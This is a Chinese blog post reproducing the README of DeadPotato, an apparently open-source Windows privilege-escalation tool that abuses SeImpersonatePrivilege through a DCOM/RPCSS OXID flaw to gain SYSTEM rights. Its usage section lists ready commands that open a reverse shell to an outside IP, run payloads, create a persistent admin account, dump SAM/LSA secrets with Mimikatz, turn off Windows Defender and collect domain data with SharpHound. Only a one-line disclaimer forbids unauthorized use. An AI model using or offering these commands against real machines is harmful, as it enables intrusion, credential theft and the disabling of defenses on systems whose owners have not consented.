首页 提权EXP 正文
  • 本文约1772字,阅读需9分钟
  • 58
  • 0

DeadPotato

摘要

DeadPotato 是 Potato 漏洞家族中的一款 Windows 特权提升实用程序,利用 SeImpersonate 权限获取 SYSTEM 特权。此脚本由 BeichenDream 根据原始 GodPotato 源代码定制而成。

图像

叉子BDG 星星BDG 许可证BDG 语言BDG

🚨 Hashdump 和 SharpHound 模块现已推出!🚨

❗ 严禁在未经授权的情况下使用此程序。DeadPotato 的作者对系统造成的任何损害不承担任何责任。请谨慎使用。❗

C:\Users\lypd0> GodPotato.exe

    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   | \ _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.2 =-
        ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

   -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

   -> deadpotato.exe -cmd "whoami"
   -> deadpotato.exe -rev 192.168.10.30:9001
   -> deadpotato.exe -exe paylod.exe
   -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
   -> deadpotato.exe -shell
   -> deadpotato.exe -mimi sam
   -> deadpotato.exe -defender off
   -> deadpotato.exe -sharphound

 (*) Available Modules:

   - cmd: Execute a command as NT AUTHORITY\SYSTEM.
   - rev: Attempts to establish a reverse shell connection to the provided host
   - exe: Execute a program with NT AUTHORITY\SYSTEM privileges (Does not support interactivity).
   - newadmin: Create a new administrator user on the local system.
   - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
   - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
   - defender: Either enables or disables Windows Defender's real-time protection.
   - sharphound: Attempts to collect domain data for BloodHound.

❔ 快速入门 - 如何使用

SeImpersonatePrivilege您的上下文中是否启用了权限?使用DeadPotato 可以在本地系统上获得最大权限。

该工具将尝试通过滥用 DCOM 的 RPCSS 处理 OXID 的缺陷来启动在用户上下文中运行的提升进程 NT AUTHORITY\SYSTEM,从而允许不受限制地访问机器以自由执行关键操作。

⚠️在以下情况下,-cmd将使用模块。有许多模块可供使用,例如 -rev IP:PORT用于生成提升的反向 shell、-newadmin usr:pass用于创建新的本地管理员用户以保持持久性或 -mimi sam用于转储 SAM 哈希的模块。

cmd_GQJhLcT9IH

验证 SeImpersonatePrivilege 权限

为了使用 DeadPotato,必须在当前上下文中启用 SeImpersonatePrivilege 权限。为了验证这一点,whoami /priv可以执行该命令。如果禁用该权限,则在当前上下文中无法利用该漏洞。

C:\Users\lypd0> whoami /priv

<...SNIP...>
SeImpersonatePrivilege    Impersonate a client after authentication     Enabled
<...SNIP...>

🐚 获取提升的反向 Shell

cmd_XQASCL7Lz6

🏅 致谢

本项目“DeadPotato”是基于 BeichenDream 的杰作“GodPotato”源代码构建的工具。如果您喜欢这个项目,请务必也去支持原项目

BeichenDream、Benjamin DELPY gentilkiwi、BloodHound 开发者。

温馨提示:本文最后更新于2024年8月8日 17:45,若内容或图片失效,请在下方留言或联系博主。
评论
更换验证码